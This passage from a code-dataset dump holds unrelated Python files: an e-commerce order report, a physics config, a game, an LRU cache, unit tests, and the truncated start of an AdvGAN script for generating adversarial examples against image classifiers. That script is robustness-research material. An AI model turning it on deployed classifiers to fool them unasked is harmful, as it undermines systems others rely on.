int(days_delta))\n","sub_path":"scripts/generateChart.py","file_name":"generateChart.py","file_ext":"py","file_size_in_byte":7447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
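findlast2dayYesterday overlays yesterday's trace on today's x-axis by shifting each of yesterday's timestamps forward one day before plotting. The trick in isolation, with a made-up date:

from datetime import datetime
from dateutil.relativedelta import relativedelta

yesterday_point = datetime(2020, 5, 3, 8, 30)
aligned = yesterday_point + relativedelta(days=1)
print(aligned)  # 2020-05-04 08:30:00 -- lands on today's 08:30 slot in the chart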
+{"seq_id":"82202832","text":"import csv\n\nfrom oscar.core.loading import import_module\nimport_module('reports.reports', ['ReportGenerator'], locals())\nimport_module('order.models', ['Order'], locals())\n\n\nclass OrderReportGenerator(ReportGenerator):\n \n filename_template = 'orders-%s-to-%s.csv'\n code = 'order_report'\n description = \"Orders placed\"\n \n def generate(self, response):\n orders = Order._default_manager.filter(\n date_placed__gte=self.start_date\n ).filter(date_placed__lt=self.end_date)\n \n writer = csv.writer(response)\n header_row = ['Order number',\n 'User',\n 'Total incl. tax',\n 'Date placed',]\n writer.writerow(header_row)\n for order in orders:\n row = [order.number, order.user, order.total_incl_tax, order.date_placed]\n writer.writerow(row)\n \n def is_available_to(self, user):\n return user.is_staff and user.has_perm('order.can_view')","sub_path":"oscar/apps/order/reports.py","file_name":"reports.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"78634403","text":"import FWCore.ParameterSet.Config as cms\nimport FWCore.ParameterSet.VarParsing as VarParsing\n\nimport subprocess\nimport sys\n\noptions = VarParsing.VarParsing()\n\noptions.register('globalTag',\n '94X_dataRun2_ReReco_EOY17_v2', #default value\n VarParsing.VarParsing.multiplicity.singleton,\n VarParsing.VarParsing.varType.string,\n \"Global Tag\")\n\noptions.register('nEvents',\n 50000, #default value\n VarParsing.VarParsing.multiplicity.singleton,\n VarParsing.VarParsing.varType.int,\n \"Maximum number of processed events\")\n\noptions.register('eosInputFolder',\n '/store/data/Run2017F/SingleMuon/RAW-RECO/ZMu-17Nov2017-v1/00000/', #default value\n VarParsing.VarParsing.multiplicity.singleton,\n VarParsing.VarParsing.varType.string,\n \"EOS folder with input files\")\n\noptions.register('outputFileName',\n './muonPOGShowers.root', #default value\n VarParsing.VarParsing.multiplicity.singleton,\n VarParsing.VarParsing.varType.string,\n \"Folder and name ame for output ntuple\")\n\noptions.parseArguments()\n\nprocess = cms.Process(\"MUONSHOWERS\")\n\nprocess.load('Configuration.StandardSequences.Services_cff')\nprocess.load('FWCore.MessageService.MessageLogger_cfi')\n\nprocess.options = cms.untracked.PSet( wantSummary = cms.untracked.bool(True) )\nprocess.MessageLogger.cerr.FwkReport.reportEvery = 1\nprocess.maxEvents = cms.untracked.PSet(input = cms.untracked.int32(options.nEvents))\n\nprocess.load('Configuration.StandardSequences.GeometryRecoDB_cff')\nprocess.load(\"TrackingTools.TransientTrack.TransientTrackBuilder_cfi\")\nprocess.load(\"Configuration.StandardSequences.MagneticField_38T_cff\")\nprocess.load('Configuration.StandardSequences.MagneticField_cff')\n\nprocess.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_condDBv2_cff')\n\nprocess.GlobalTag.globaltag = cms.string(options.globalTag)\n\nprocess.source = cms.Source(\"PoolSource\",\n \n fileNames = cms.untracked.vstring(),\n secondaryFileNames = cms.untracked.vstring()\n\n)\n\nprocess.TFileService = cms.Service(\"TFileService\", \n fileName = cms.string(\"muonShower.root\")\n )\n\nfiles = subprocess.check_output([ \"/afs/cern.ch/project/eos/installation/0.3.15/bin/eos.select\", \"ls\", options.eosInputFolder ])\nprocess.source.fileNames = [options.eosInputFolder+\"/\"+f for f in files.split() ] \n\nprocess.load('Configuration.StandardSequences.RawToDigi_cff')\n\nprocess.load(\"MuonShowers.Tools.muonShowerProducer_cfi\")\nprocess.load(\"MuonShowers.Tools.muonShowerTest_cfi\")\n\nprocess.out = cms.OutputModule(\"PoolOutputModule\",\n outputCommands = cms.untracked.vstring('keep *'),\n fileName = cms.untracked.string(options.outputFileName)\n )\n\nprocess.muonShowersPath = cms.Path(process.muonDTDigis + process.muonShowerProducer + process.muonShowerTest)\n#process.outPath = cms.EndPath(process.out)\n","sub_path":"Tools/test/muonShowers_cfg.py","file_name":"muonShowers_cfg.py","file_ext":"py","file_size_in_byte":3175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"59814886","text":"import requests\n\nfrom .demcreate import demcreate\nfrom .arrangedem import arrangedem\nfrom .quote import quote\nfrom .text_gen import text_gen\n\nCURRENT_VERSION = '1.8.0'\n\ntry:\n    version = requests.get(\n        'https://raw.githubusercontent.com/infqq/simpledemotivators/master/simpledemotivators/version.txt'\n    ).text.splitlines()\nexcept requests.RequestException:\n    # Offline or GitHub unreachable: skip the update check instead of failing on import\n    version = None\n\nif version is None:\n    print('SimpleDemotivators started, version check skipped (no network).')\nelif version[0] != CURRENT_VERSION:\n    print(\n        f'[SimpleDemotivators] Данная версия библиотеки устарела, обновитесь до v{version[0]} с GitHub\\nИзменения: {version[1]}')\nelse:\n    print(\n        f'SimpleDemotivators v{version[0]} started, version is up to date.')\n\n__all__ = (\n    'demcreate',\n    'arrangedem',\n    'quote',\n    'text_gen'\n)","sub_path":"simpledemotivators/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"592157389","text":"import asyncio\nfrom math import sin\nfrom sys import exit\nfrom random import choice, randint\nfrom direct.showbase.ShowBase import *\nfrom direct.filter.CommonFilters import CommonFilters\nfrom panda3d.core import ClockObject, WindowProperties, DirectionalLight\nfrom .readfile import cfgdict\nfrom .map import Map\nfrom .inputs import Inputs\nfrom .wireframify import makeWireframe\nfrom .player import Player\nfrom .hud import HUD\nfrom .tools import makeInstance\nfrom .data import getParts, getPartsColors\nfrom .items import items\nfrom direct.showbase.Transitions import Transitions\n\nclass Game(ShowBase):\n\tdef __init__(self):\n\t\tShowBase.__init__(self)\n\t\tself.cfg = cfgdict(\"data/default_config.cfg\")\n\t\tglobalClock.setMode(ClockObject.MLimited)\n\t\tglobalClock.setFrameRate(int(self.cfg[\"general\"][\"framerate\"]))\n\t\t#base.setFrameRateMeter(int(self.cfg[\"general\"][\"debug\"]))\n\t\tself.props = WindowProperties()\n\t\tself.props.setSize(tuple(self.cfg[\"general\"][\"resolution\"]))\n\t\tself.props.setFullscreen(int(self.cfg[\"general\"][\"fullscreen\"]))\n\t\tself.props.setCursorHidden(True)\n\t\tself.fullscreen = int(self.cfg[\"general\"][\"fullscreen\"])\n\t\t#props.setMouseMode(WindowProperties.M_relative)\n\t\tbase.win.requestProperties(self.props)\n\t\tbase.disableMouse()\n\t\tbase.win.setClearColor((0,0,0,0))\n\t\tself.inputs = Inputs(self.cfg[\"key\"])\n\n\t\t#cats=[\"mainmenu\", \"parts\", \"enemies\", \"items\"]\n\t\t#for cat in cats: makeWireframe(cat)\n\n\t\tself.hud = HUD(self)\n\n\t\tself.transition = Transitions(loader)\n\t\tself.parts_models = getParts(\"data/models/egg/parts/parts\")\n\t\tself.enemy_models = getParts(\"data/models/egg/enemies/enemies\")\n\t\tself.item_models = getParts(\"data/models/egg/items/items\")\n\n\t\tsounds = [\n\t\t\t\"break\", \"error\", \"explosion\", \"hit_a\", \"hit_b\", \"hit_c\", \"scare\",\n\t\t\t\"select_a\", \"select_b\", \"splurt_a\", \"splurt_b\", \"swallow\",\n\t\t\t\"step_enemy_a\", \"step_enemy_b\", \"step_enemy_c\", \"step_player\", \"turn\",\n\t\t\t\"projectile_a\", \"projectile_b\", \"projectile_c\",\n\t\t]\n\t\tself.sounds = {}\n\t\tfor sound in sounds:\n\t\t\tself.sounds[sound] = loader.loadSfx(\"data/sound/\"+sound+\".wav\")\n\t\tself.sounds[\"step_player\"].setVolume(0.3)\n\t\tself.act = False\n\t\tif self.cfg[\"general\"][\"fx\"] == 1:\n\t\t\trender.setShaderAuto()\n\t\t\taspect2d.setShaderAuto()\n\t\t\tfilters = CommonFilters(base.win, base.cam)\n\t\t\tfilters.setBloom(blend=(0.1,0.1,0.1,0.0), mintrigger=0.0, maxtrigger=0.1, desat=0.0, intensity=0.6, size=\"small\")\n\t\t#self.startGame()\n\n\tdef startGame(self):\n\t\tself.hud.output.append(\"...\")\n\t\tself.hud.output.append(\"You wake up, head on the keyboard.\")\n\t\tself.hud.output.append(\"Where is everybody?\")\n\t\trender.node().removeAllChildren()\n\t\tself.mode = \"game\"\n\t\tself.delay = 0\n\t\tself.map = Map(self, 1)\n\t\tself.player = Player(self.map.start[0], self.map.start[1], 2)\n\t\tself.transition.setFadeColor(0, 0, 0)\n\t\tself.transition.fadeIn(2)\n\t\td = DirectionalLight(\"d\")\n\t\tdn = render.attachNewNode(d)\n\t\tself.actions = []\n\t\tbase.camera.setHpr(0,0,0)\n\t\tbase.camera.setPos(0,0,0)\n\t\tdrinks = [\"red\", \"yellow\", \"orange\", \"green\", \"blue\", \"purple\"]\n\t\ttypes = [\"health\", \"cure\", \"poison\", \"blind\", \"improve\", \"warmth\"]\n\t\tself.drinks = {}\n\t\tfor drink in drinks:\n\t\t\trt = choice(types)\n\t\t\ttypes.remove(rt)\n\t\t\tself.drinks[drink] = [rt, 
False]\n\t\trender.setLight(dn)\n\n\tdef nextLevel(self):\n\t\trender.node().removeAllChildren()\n\t\trender.hide()\n\t\tself.transition.setFadeColor(0, 0, 0)\n\t\tself.transition.fadeOut(1)\n\t\tself.delay = 0\n\t\tself.actions = []\n\t\tself.map = Map(self, self.map.level+1)\n\t\tself.hud.output.append(\"You reach the \" + str(20-self.map.level) + \"th floor.\")\n\t\tself.player.place = [self.map.start[0], self.map.start[1]-1, 2]\n\t\tself.player.prev_place = self.player.place[:]\n\t\tself.player.pos = [self.map.start[0], self.map.start[1]-1]\n\t\trender.show()\n\t\tself.player.camera.node.reparentTo(render)\n\t\td = DirectionalLight(\"d\")\n\t\tdn = render.attachNewNode(d)\n\t\trender.setLight(dn)\n\t\tself.transition.fadeIn(1)\n\t\tself.mode = \"game\"\n\n\tdef mainMenu(self, task):\n\t\tif self.running:\n\t\t\tself.mcp[3]+=1\n\t\t\tself.mcp[2] = 8 + (sin(self.mcp[3]/50)*7)\n\t\t\tbase.camera.setPos(self.mcp[0], self.mcp[1], self.mcp[2])\n\t\t\tself.buildingmodel[\"tower\"][0].setHpr(self.mcp[3],0,0)\n\t\t\tself.buildingmodel[\"tower\"][1].setHpr(self.mcp[3],0,0)\n\t\t\tif self.inputs.buttons[\"quit\"]:\n\t\t\t\tself.running = False\n\t\t\tif self.inputs.buttons[\"stats\"]:\n\t\t\t\tself.inputs.buttons[\"stats\"] = False\n\t\t\t\tself.bgsong.stop()\n\t\t\t\tself.sounds[\"select_b\"].play()\n\t\t\t\tbase.camera.setPos(0,0,0)\n\t\t\t\tself.hud.loadGameHud()\n\t\t\t\tself.startGame()\n\t\t\t\tself.bgsong = loader.loadSfx(\"data/music/LEVEL1.ogg\")\n\t\t\t\tself.bgsong.setVolume(0.3)\n\t\t\t\tself.bgsong.setLoop(True)\n\t\t\t\tself.bgsong.play()\n\t\t\t\tself.taskMgr.add(self.loop, \"main_loop\")\n\t\t\t\treturn False\n\t\t\treturn task.cont\n\t\tprint(\"bye!\")\n\t\texit()\n\n\tdef load(self):\n\t\tself.running = True\n\t\tself.actions = []\n\t\tself.bgsong = loader.loadSfx(\"data/music/THEME.ogg\")\n\t\tself.bgsong.setVolume(0.5)\n\t\tself.bgsong.setLoop(True)\n\t\tself.bgsong.play()\n\n\t\tself.buildingmodel = getParts(\"data/models/egg/mainmenu/mainmenu\")\n\t\tself.buildingmodel[\"tower\"][0].reparentTo(render)\n\t\tself.buildingmodel[\"tower\"][1].reparentTo(render)\n\n\t\td = DirectionalLight(\"d\")\n\t\tdn = render.attachNewNode(d)\n\t\trender.setLight(dn)\n\t\tself.mcp = [0,-20,8, 1200]\n\t\tself.taskMgr.add(self.mainMenu, \"main_menu\")\n\n\tdef loop(self, task):\n\t\tif self.running:\n\t\t\tself.hud.update()\n\t\t\tif self.mode == \"game\":\n\t\t\t\tif self.inputs.buttons[\"quit\"]:\n\t\t\t\t\tself.running = False\n\t\t\t\tif self.player.stats.status == \"Dying\":\n\t\t\t\t\tself.hud.output.append(\"You died.\")\n\t\t\t\t\tself.mode = \"gameover\"\n\t\t\t\t\tself.sounds[\"explosion\"].play()\n\t\t\t\t\ttaskMgr.add(die())\n\t\t\t\telse:\n\t\t\t\t\tself.delay -= 1\n\t\t\t\t\tif self.delay <= 0:\n\t\t\t\t\t\tself.delay = 0\n\t\t\t\t\t\tif len(self.actions) > 0:\n\t\t\t\t\t\t\tfor action in self.actions:\n\t\t\t\t\t\t\t\ta = action[0](action[1])\n\t\t\t\t\t\t\t\tif a == 1:\n\t\t\t\t\t\t\t\t\tself.actions.remove(action)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tself.input()\n\t\t\t\t\t\tself.update()\n\t\t\telif self.mode == \"gameover\":\n\t\t\t\tbase.camera.setH(base.camera.getH()+2)\n\t\t\t\tbase.camera.setZ(base.camera.getZ()-0.001)\n\t\t\t# Hud input, choices, etc.\n\t\t\telif self.mode == \"inventory\":\n\t\t\t\tclose = False\n\t\t\t\tif self.inputs.buttons[\"return\"]:\n\t\t\t\t\tclose = True\n\t\t\t\telse:\n\t\t\t\t\tabc = \"abcdefghijklmnopqrstuvwxyz0123456789\"\n\t\t\t\t\tcc = 100\n\t\t\t\t\tif not self.inputs.raw_key == None:\n\t\t\t\t\t\tif self.inputs.raw_key in 
abc:\n\t\t\t\t\t\t\tfor l, letter in enumerate(abc):\n\t\t\t\t\t\t\t\tif self.inputs.raw_key == letter:\n\t\t\t\t\t\t\t\t\tcc = l\n\t\t\t\t\t\tif cc < len(self.hud.choices):\n\t\t\t\t\t\t\titem = self.hud.choices[cc]\n\t\t\t\t\t\t\tif self.hud.verb == \"inventory\":\n\t\t\t\t\t\t\t\tpass\n\t\t\t\t\t\t\telif self.hud.verb == \"drop\":\n\t\t\t\t\t\t\t\tf = self.player.drop(item)\n\t\t\t\t\t\t\t\tif f: self.act = True\n\t\t\t\t\t\t\telif self.hud.verb == \"throw\":\n\t\t\t\t\t\t\t\tself.player.throw(item)\n\t\t\t\t\t\t\t\tself.act = True\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tf = self.hud.choices[cc].use(self.player)\n\t\t\t\t\t\t\t\tif f: self.act = True\n\t\t\t\t\t\t\tclose = True\n\t\t\t\tif close:\n\t\t\t\t\tself.mode = \"game\"\n\t\t\t\t\tself.hud.inventory[0].setText(\"\")\n\t\t\t\t\tself.hud.choices = []\n\t\t\t\t\tself.inputs.buttons[\"return\"] = False\n\n\t\t\telif self.mode == \"restart\":\n\t\t\t\tself.startGame()\n\t\t\tself.inputs.raw_key = None\n\t\t\treturn task.cont\n\t\tprint(\"bye!\")\n\t\texit()\n\n\tdef input(self):\n\t\tact = self.act\n\t\ttile = self.map.grid[self.player.pos[1]][self.player.pos[0]]\n\t\tif act == False:\n\t\t\tif self.inputs.buttons[\"turn_left\"]:\n\t\t\t\tself.sounds[\"turn\"].play()\n\t\t\t\tself.player.turn(1)\n\t\t\t\tself.actions.append((self.player.turn, 1))\n\t\t\telif self.inputs.buttons[\"turn_right\"]:\n\t\t\t\tself.sounds[\"turn\"].play()\n\t\t\t\tself.player.turn(-1)\n\t\t\t\tself.actions.append((self.player.turn, -1))\n\t\t\telif self.inputs.buttons[\"forward\"]:\n\t\t\t\ten = self.player.move(-1)\n\t\t\t\tif not en == \"cancel\":\n\t\t\t\t\tif en == \"melee\":\n\t\t\t\t\t\tself.delay = 10\n\t\t\t\t\t\tself.player.stats.attack(self.player.target.stats, True)\n\t\t\t\t\t\tself.player.target.switchFrame(\"hurt\")\n\t\t\t\t\t\tself.transition.setFadeColor(0.1,0.1,0.1)\n\t\t\t\t\t\tself.transition.fadeOut(0.1)\n\t\t\t\t\t\tself.transition.fadeIn(0.01)\n\t\t\t\t\t\tself.hud.update()\n\t\t\t\t\t\tl = \"_a\", \"_b\", \"_c\"\n\t\t\t\t\t\tself.sounds[\"hit\"+choice(l)].play()\n\t\t\t\t\t\tact = True\n\t\t\t\t\telse:\n\t\t\t\t\t\tself.actions.append((self.player.move,-1))\n\t\t\t\t\t\tact = True\n\t\t\telif self.inputs.buttons[\"backward\"]:\n\t\t\t\tself.sounds[\"turn\"].play()\n\t\t\t\tself.player.turn(1)\n\t\t\t\tself.actions.append((self.player.turn, 1))\n\t\t\t\tself.player.turn(1)\n\t\t\t\tself.actions.append((self.player.turn, 1))\n\t\t\telif self.inputs.buttons[\"fire\"]:\n\t\t\t\tf = self.player.fire()\n\t\t\t\tif f:\n\t\t\t\t\tact = True\n\n\t\t\telif self.inputs.buttons[\"wait\"]:\n\t\t\t\tact = True\n\t\t\t\tself.sounds[\"turn\"].play()\n\t\t\t\tself.delay = 10\n\t\t\t\tself.hud.output.append(\"You wait.\")\n\t\t\telif self.inputs.buttons[\"take\"]:\n\t\t\t\tif not tile.item == None:\n\t\t\t\t\tabc = \"abcdefghijklmnopqrstuvwxyz\"\n\t\t\t\t\tif len(self.player.stats.inventory) < len(abc):\n\t\t\t\t\t\tself.sounds[\"select_b\"].play()\n\t\t\t\t\t\ttile.item[0].removeNode()\n\t\t\t\t\t\ti = tile.item[1]\n\t\t\t\t\t\tself.player.stats.inventory.append(i)\n\t\t\t\t\t\tself.hud.output.append(\"You found a \" + i.name)\n\t\t\t\t\t\ttile.item = None\n\t\t\t\t\t\tact = True\n\t\t\t\t\telse:\n\t\t\t\t\t\tself.hud.output.append(\"You can't carry any more.\")\n\t\t\t\t\t\tself.delay = 10\n\t\t\telif self.inputs.buttons[\"stairs_down\"]:\n\t\t\t\tif tile.c == \"<\":\n\t\t\t\t\tself.nextLevel()\n\t\t\t\tself.inputs.buttons[\"stairs_down\"] = False\n\t\t\telif self.inputs.buttons[\"fullscreen\"]:\n\t\t\t\tif self.fullscreen:\n\t\t\t\t\tself.fullscreen 
= 0\n\t\t\t\telse:\n\t\t\t\t\tself.fullscreen = 1\n\t\t\t\tself.props.setFullscreen(int(self.fullscreen))\n\t\t\t\tbase.win.requestProperties(self.props)\n\t\t\t\tself.inputs.buttons[\"fullscreen\"] = False\n\t\t\telse:\n\t\t\t\tverbs = \"inventory\", \"drop\", \"throw\", \"eat\",\"quaff\", \"wield\", \"stats\", \"help\"\n\t\t\t\tfor i in self.inputs.buttons:\n\t\t\t\t\tif self.inputs.buttons[i]:\n\t\t\t\t\t\tif i in verbs:\n\t\t\t\t\t\t\tself.mode = \"inventory\"\n\t\t\t\t\t\t\tself.hud.inv(self.player, i)\n\t\t\t\t\t\t\tself.inputs.buttons[i] = False\n\t\tif act:\n\t\t\tself.act = False\n\t\t\tself.player.stats.turn()\n\t\t\tfor e, enemy in enumerate(self.map.enemies):\n\t\t\t\tif self.player.stats.speedboost <= 0 or randint(0,2) == 0:\n\t\t\t\t\ten = enemy.plan(self, e)\n\t\t\t\t\tif en:\n\t\t\t\t\t\tenemy.stats.turn()\n\t\t\t\t\t\tself.actions.append((enemy.move, self))\n\t\t\tself.player.stats.updateStats()\n\n\tdef update(self):\n\t\tself.player.update()\n\t\tfor enemy in self.map.enemies:\n\t\t\tenemy.update(self)\n\nasync def die():\n\tgame.transition.setFadeColor(1, 0, 0)\n\tawait game.transition.fadeOut(2)\n\tgame.startGame()\n","sub_path":"game/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":10125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"372769614","text":"class Node(object):\n\n    def __init__(self, key, value, prev=None, next=None):\n        self.key = key\n        self.value = value\n        self.prev = prev\n        self.next = next\n\n    # define __repr__ to decide what a print statement displays for a Node object\n    def __repr__(self):\n        return f\"Node(key: {self.key}, value: {self.value})\"\n\n    def __str__(self):\n        return f\"Node(key: {self.key}, value: {self.value})\"\n\n\n# A doubly linked list: nodes can be unlinked and re-linked at the head in O(1)\nclass DLL(object):\n    def __init__(self):\n        self.head = None\n        self.tail = None\n        self.nodeCount = 0\n\n    def removeNode(self, node):\n        if node.prev is not None:\n            node.prev.next = node.next\n        else:\n            self.head = node.next\n\n        if node.next is not None:\n            node.next.prev = node.prev\n        else:\n            self.tail = node.prev\n\n        self.nodeCount -= 1\n\n    def prependNode(self, node):\n        node.next = self.head\n        node.prev = None\n\n        if self.head is not None:\n            self.head.prev = node\n\n        self.head = node\n\n        if self.tail is None:\n            self.tail = self.head\n\n        self.nodeCount += 1\n        return node\n\n    def prepend(self, key, value):\n        \"\"\"Add a node with key and value to the top of the list.\"\"\"\n        new_node = Node(key, value)\n        return self.prependNode(new_node)\n\n    def append(self, key, value):\n        \"\"\"Add a node with key and value to the bottom of the list.\"\"\"\n        new_node = Node(key, value)\n\n        if self.head is None:\n            self.head = self.tail = new_node\n        else:\n            new_node.prev = self.tail\n            new_node.next = None\n            self.tail.next = new_node\n            self.tail = new_node\n\n        self.nodeCount += 1\n        return new_node\n\n    def printList(self):\n        \"\"\"Display the data inside the linked list.\"\"\"\n        print(\"-\" * 10)\n        print(\"\\n\\nShow Doubly linked list data:\")\n        print(\"-\" * 30)\n        current_node = self.head\n        counter = 0\n        while current_node is not None:\n            counter += 1\n            print(\"\\n\")\n            print(f\"{counter}:\")\n            if hasattr(current_node.prev, \"value\"):\n                print(f\"prev: {current_node.prev}\")\n            print(f\"current: {current_node}\")\n            if hasattr(current_node.next, \"value\"):\n                print(f\"next: {current_node.next}\")\n\n            current_node = current_node.next\n        print(\"-\" * 30, \"\\n\\n\\n\")\n\n\nclass LRU_Cache(DLL):\n    \"\"\"Use a dictionary to store pointers to nodes in the cache.\"\"\"\n\n    def __init__(self, capacity=0):\n        # Initialize class variables\n        self.capacity = capacity\n        self.cStorage = {}\n\n        # Call the DoublyLinkedList constructor\n        super().__init__()\n\n    def get(self, key):\n        if key in self.cStorage:\n            node = self.cStorage.get(key)\n            # Move the accessed node to the front (most recently used)\n            self.removeNode(node)\n            self.prependNode(node)\n            return node.value\n\n        return -1\n\n    def set(self, key, value):\n        if key in self.cStorage:\n            # The key already exists: update its value and move the node to the front\n            node = self.cStorage.get(key)\n            node.value = value\n            self.removeNode(node)\n            self.prependNode(node)\n        else:\n            # At capacity: evict the least recently used item (the tail)\n            # from both the linked list and the dictionary\n            if len(self.cStorage) >= self.capacity and self.tail is not None:\n                del self.cStorage[self.tail.key]\n                self.removeNode(self.tail)\n\n            # Add the new node to the front of the list\n            newnode = self.prepend(key, value)\n            self.cStorage[key] = newnode\n\n\nif __name__ == '__main__':\n\n    def run_test():\n        \"\"\"Add data to the cache in order to verify the values stored.\"\"\"\n        our_cache = LRU_Cache(5)\n\n        our_cache.set(1, 1)\n        our_cache.set(2, 2)\n        our_cache.set(3, 3)\n        our_cache.set(4, 4)\n\n        print(our_cache.get(1))  # returns 1\n        print(our_cache.get(2))  # returns 2\n        print(our_cache.get(9))  # returns -1 because 9 is not present in the cache\n        print(our_cache.get(''))  # returns -1 because '' is not present in the cache\n\n        # Add items beyond the capacity so the least recently used entry is evicted\n        our_cache.set(5, 5)\n        our_cache.set(6, 6)\n\n        # returns -1 because 3 was the least recently used entry when the cache\n        # reached its capacity, therefore it got deleted\n        print(our_cache.get(3))\n\n        print(\"Nodes in list: \", our_cache.nodeCount)\n\n        print(list(our_cache.cStorage.keys()))\n        # Uncomment our_cache.printList() to view the doubly linked list\n        # our_cache.printList()\n\n    run_test()\n","sub_path":"Project 2/LRU_Cache/LRU_Cache.py","file_name":"LRU_Cache.py","file_ext":"py","file_size_in_byte":5053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"2905832","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\nimport unittest\n\nimport numpy as np\nimport pandas as pd\nimport thingsvision.vision as vision\n\nfrom thingsvision.dataset import ImageDataset\nfrom torch.utils.data import DataLoader\n\nDEVICE = 'cpu'\nIN_PATH = './images92'\nOUT_PATH = './test'\nMODEL_NAMES = ['vgg16_bn', 'vgg19_bn']\nMODULE_NAMES = ['features.23', 'classifier.3']\nFILE_FORMATS = ['.npy', '.txt']\nBATCH_SIZE = 32\n\nclass ModelLoadingTestCase(unittest.TestCase):\n\n def test_mode_and_device(self):\n model, _ = vision.load_model(\n model_name=MODEL_NAMES[0],\n pretrained=True,\n device=DEVICE,\n )\n self.assertTrue(hasattr(model, DEVICE))\n self.assertFalse(model.training)\n\nclass ExtractionTestCase(unittest.TestCase):\n\n def test_extraction(self):\n model, transforms = vision.load_model(\n model_name=MODEL_NAMES[0],\n pretrained=True,\n device=DEVICE,\n )\n dataset = ImageDataset(\n root=IN_PATH,\n out_path=OUT_PATH,\n transforms=transforms,\n imagenet_train=None,\n imagenet_val=None,\n things=None,\n things_behavior=None,\n add_ref_imgs=None,\n )\n dl = DataLoader(\n dataset,\n batch_size=BATCH_SIZE,\n shuffle=False,\n )\n\n features, targets = vision.extract_features(\n model=model,\n data_loader=dl,\n module_name=MODULE_NAMES[0],\n batch_size=BATCH_SIZE,\n flatten_acts=False,\n device=DEVICE,\n )\n\n for format in FILE_FORMATS:\n vision.save_features(\n features=features,\n out_path=OUT_PATH,\n file_format=format,\n )\n self.assertEqual(features.shape[0], len(dataset))\n self.assertEqual(len(targets), features.shape[0])\n\n if MODULE_NAMES[0].startswith('classifier'):\n self.assertEqual(features.shape[1], model.classifier[int(MODULE_NAMES[0][-1])].out_features)\n\n self.assertTrue(isinstance(features, np.ndarray))\n self.assertTrue(isinstance(targets, np.ndarray))\n\nclass SlicingTestCase(unittest.TestCase):\n\n def test_slicing(self):\n features_npy = np.load(os.path.join(OUT_PATH, 'features.npy'))\n features_txt = vision.slices2tensor(OUT_PATH, 'features.txt')\n\n self.assertEqual(features_npy.shape, features_txt.shape)\n\nclass ComparisonTestCase(unittest.TestCase):\n\n def test_comparison(self):\n\n corr_mat = vision.compare_models(\n root=IN_PATH,\n out_path=OUT_PATH,\n model_names=MODEL_NAMES,\n module_names=MODULE_NAMES,\n pretrained=True,\n batch_size=BATCH_SIZE,\n flatten_acts=True,\n clip=[False, False],\n save_features=False,\n )\n self.assertTrue(isinstance(corr_mat, pd.DataFrame))\n self.assertEqual(corr_mat.shape, (len(MODEL_NAMES), len(MODULE_NAMES)))\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"unittests.py","file_name":"unittests.py","file_ext":"py","file_size_in_byte":4058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"182531056","text":"import os\nimport argparse\n\nimport torch\nimport torchvision.transforms as transforms\nfrom torch.utils.data import DataLoader\nfrom torchvision import datasets\n\nimport cifar10.cifar_loader as cifar_loader\nimport resnet\nfrom advGAN import AdvGAN_Attack\nfrom cifar10.cifar_resnets import resnet32\nfrom models import MNIST_target_net\nimport models\nuse_cuda = True\nimage_nc = 3\nbatch_size = 128\nBOX_MIN = 0\nBOX_MAX = 1\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--dataset', type=str, default='mnist', choices=['mnist', 'fashion-mnist', 'cifar10', 'cifar100', 'svhn', 'stl10', 'lsun-bed'],\n help='The name of dataset')\nparser.add_argument('--epoch', type=int, default=60, help='The number of epochs to run')\nparser.add_argument('--batch_size', type=int, default=128, help='The size of batch')\nparser.add_argument('--checkpoint',type=str,default='')\nparser.add_argument('--target_model',type=str,default=\"\")\nargs = parser.parse_args()\n\nif __name__ == '__main__':\n # Define what device we are using\n print(\"CUDA Available: \", torch.cuda.is_available())\n device = torch.device(\"cuda\" if (\n use_cuda and torch.cuda.is_available()) else \"cpu\")\n\n # net = resnet.ResNet18()\n # net = net.cuda()\n # net = torch.nn.DataParallel(net)\n # checkpoint = torch.load(\"H:/adversarial_attacks/pytorch-cifar/checkpoint/DataPackpt.pth\")\n # net.load_state_dict(checkpoint['net'])\n # target_model = net\n\n # resnet32\n if args.target_model == 'resnet32':\n target_model = cifar_loader.load_pretrained_cifar_resnet(flavor=32)\n elif args.target_model == 'resnet20':\n target_model = cifar_loader.load_pretrained_cifar_resnet(flavor=20)\n elif args.target_model == 'wideresnet':\n target_model = cifar_loader.load_pretrained_cifar_wide_resnet()\n elif args.target_model==\"mnist_2\":\n target_model = models.LeNet5()\n target_model.load_state_dict(torch.load('./trained_lenet5.pkl'))\n # target_model = target_model.cuda()\n # target_model.eval()\n\n # resnet32_advtrain\n # target_model = resnet32()\n # target_model.load_state_dict(torch.load('./advtrain.resnet32.000100.path.tar'))\n\n target_model = target_model.cuda()\n target_model.eval()\n\n model_num_labels = 10\n normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n transform = transforms.Compose([\n transforms.RandomHorizontalFlip(),\n transforms.RandomCrop(32, 4),\n transforms.ToTensor(),\n normalize,\n ])\n # MNIST train dataset and dataloader declaration\n # mnist_dataset = torchvision.datasets.MNIST('./dataset', train=True, transform=transforms.ToTensor(), download=True)\n # transform = transforms.Compose([transforms.ToTensor()])\n # dataloader = DataLoader(\n # datasets.MNIST('./dataset/MNIST',\n # train=True, download=True, transform=transform), \n # batch_size=batch_size, shuffle=True)\n\n # cifar10\n dataloader = DataLoader(\n datasets.CIFAR10('../cifar-10-batches-py', train=True, download=True, transform=transform),\n batch_size=batch_size, shuffle=True)\n advGAN = AdvGAN_Attack(device,\n 